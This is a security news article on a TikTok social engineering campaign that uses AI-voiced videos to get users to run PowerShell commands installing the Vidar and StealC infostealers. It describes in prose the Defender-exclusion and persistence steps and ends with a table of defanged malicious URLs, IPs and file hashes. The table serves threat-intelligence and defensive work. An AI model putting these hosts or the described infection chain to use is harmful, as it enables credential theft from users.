A sophisticated social engineering campaign that leverages the viral power of TikTok to distribute dangerous information-stealing malware, specifically Vidar and StealC.
This alarming trend marks a shift in cybercriminal tactics, moving away from traditional methods like fake CAPTCHA pages to exploiting the vast user base and algorithmic reach of social media platforms.
Unlike previous attacks that relied on detectable malicious code or compromised websites, this campaign uses carefully crafted video content potentially AI-generated to deceive users into executing harmful PowerShell commands under the guise of activating legitimate software like Windows OS, Microsoft Office, or Spotify.
.png
)
With one video reportedly garnering over 500,000 views, the potential scale of this threat is staggering, posing significant risks to both individual users and businesses through data exfiltration and credential theft.
New Social Engineering Threat on Social Media
The campaign operates through TikTok accounts such as @gitallowed, @zane.houghton, and others, which have since been deactivated.
According to Trend Micro Report, these accounts posted faceless videos with AI-generated voices providing step-by-step instructions to users, guiding them to open PowerShell via the Windows + R command and execute scripts from URLs like hxxps://allaivo[.]me/spotify.
These scripts initiate a malicious chain of execution, creating hidden directories in APPDATA and LOCALAPPDATA folders, adding them to Windows Defender’s exclusion list to evade detection, and downloading secondary payloads identified as Vidar or StealC from domains like hxxps://amssh[.]co/file.exe.
Hackers Exploit TikTok’s Algorithmic Reach
The malware establishes persistence through registry keys and connects to command-and-control (C&C) servers, some of which abuse legitimate platforms like Steam and Telegram to obscure their infrastructure.
This method of delivery, relying entirely on visual and auditory social engineering rather than embedded malicious code, makes traditional detection mechanisms less effective and highlights the evolving nature of cyber threats.
For businesses and individuals, the implications are severe, as these attacks exploit user trust rather than technical vulnerabilities.
Security strategies must adapt by integrating social media threat intelligence to monitor emerging campaigns, employing behavioral analysis to detect anomalous activities like unexpected PowerShell executions, and enhancing user education to recognize and report suspicious content.
Trend Vision One offers a robust defense against such threats, providing AI-powered cybersecurity tools, threat insights, and hunting queries to detect indicators of compromise (IOCs) associated with this campaign.
As cybercriminals continue to weaponize popular platforms like TikTok, proactive measures and awareness are critical to mitigating the risks of mass compromise.
Indicators of Compromise (IOCs)
| Type | Value |
|---|---|
| File Hash | 3bb81c977bb34fadb3bdeac7e61193dd009725783fb2cf453e15ced70fc39e9b |
| File Hash | afc72f0d8f24657d0090566ebda910a3be89d4bdd68b029a99a19d146d63adc5 |
| File Hash | b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886 |
| URL | hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php |
| URL | hxxps://allaivo[.]me/spotify |
| URL | hxxps://amssh[.]co/file[.]exe |
| URL | hxxps://amssh[.]co/script[.]ps1 |
| URL | hxxps://steamcommunity[.]com/profiles/76561199846773220 |
| URL | hxxps://t[.]me/v00rd |
| IP | hxxps://49[.]12[.]113[.]201 |
| IP | hxxps://116[.]202[.]6[.]216 |
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
